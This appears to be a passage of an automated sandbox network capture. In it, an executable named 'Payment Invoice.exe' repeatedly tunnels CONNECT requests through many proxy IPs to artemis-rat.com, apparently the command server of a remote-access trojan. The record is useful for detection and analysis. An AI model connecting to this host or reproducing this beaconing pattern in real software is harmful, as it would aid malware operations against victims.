                                                                Mar 11, 2024 16:15:15.706080914 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 02 0d 5d 2e 0a 83 9e 93 03 4e 05 5e 2a d3 59 3e 83 07 86 b0 57 38 d2 03 d6 24 ba 36 3c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e ].N^*Y>W8$6<*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:16.090780973 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 aa 25 73 a6 cb a1 24 4f dd fe 97 95 8f bb bb ef af aa 69 cd bd db 90 8f 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9%s$OiDOWNGRD0000*H010Uartemis-rat.com0240311144532Z260311144532Z010Uartemis-rat.com0"0*H0!y^.s=
                                                                Mar 11, 2024 16:15:16.199316978 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 77 fc b8 a9 6e 7e ef 23 c6 e9 29 8e 5a 8b 1c 5d 4c 15 e8 34 82 6d 19 2d 24 04 31 6f 37 44 a8 74 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 d3 c7 ae 43 7c 75 94 b7 60 4e 4c 49 3d 77 36 fc 83 b8 1b 71 b0
                                                                Data Ascii: %! wn~#)Z]L4m-$1o7Dt(C|u`NLI=w6qREsKO
                                                                Mar 11, 2024 16:15:16.582813978 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 85 28 0b 91 e4 91 13 70 11 64 3d d4 86 7e ff 18 00 67 4d 90 d8 0d 8d 44 d7 12 c3 9f 74 b5 75 13 d4 f7 5e 0d 3f 4b 12 1c
                                                                Data Ascii: ((pd=~gMDtu^?K


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                299192.168.2.450887202.179.184.4454307076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.321850061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                300192.168.2.450897174.64.199.8241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.324532986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                301192.168.2.45096168.1.210.16341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.334791899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                302192.168.2.4498701.194.236.22950057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.339891911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.511038065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.512198925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.527097940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.620538950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.497845888 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                303192.168.2.449878176.88.166.21880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.341463089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.511038065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.512346029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                304192.168.2.4507235.44.42.115583867076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.350214005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                305192.168.2.45089089.36.114.38807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.357264996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.075139999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.089191914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214608908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.324208021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.527034044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.714490891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.824121952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.214215994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                306192.168.2.45063541.77.188.131807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.357877016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.556832075 CET908INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                X-Content-Type-Options: nosniff
                                                                Content-Length: 597
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache Server at artemis-rat.com Port 443</address></body></html>
                                                                Mar 11, 2024 16:15:17.406434059 CET908INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                X-Content-Type-Options: nosniff
                                                                Content-Length: 597
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                307192.168.2.450841115.96.208.12480807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.361411095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.759259939 CET72INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                308192.168.2.449977162.241.50.179498587076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.366837025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.386205912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480251074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.589479923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                309192.168.2.450987185.18.198.163587147076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.368895054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.995460987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.854870081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                310192.168.2.451024162.243.102.20797647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.369714022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                311192.168.2.45089847.242.234.237807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.372471094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                312192.168.2.450984212.110.188.195344117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.372737885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.011101961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.886636019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.677414894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.248996973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.777028084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.386327982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.480470896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                313192.168.2.45093049.12.126.53571447076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.375699997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.042300940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.089524984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                314192.168.2.45103523.95.209.142156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.384946108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                315192.168.2.450975103.197.71.7807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.392007113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.057915926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.089545012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.054250002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
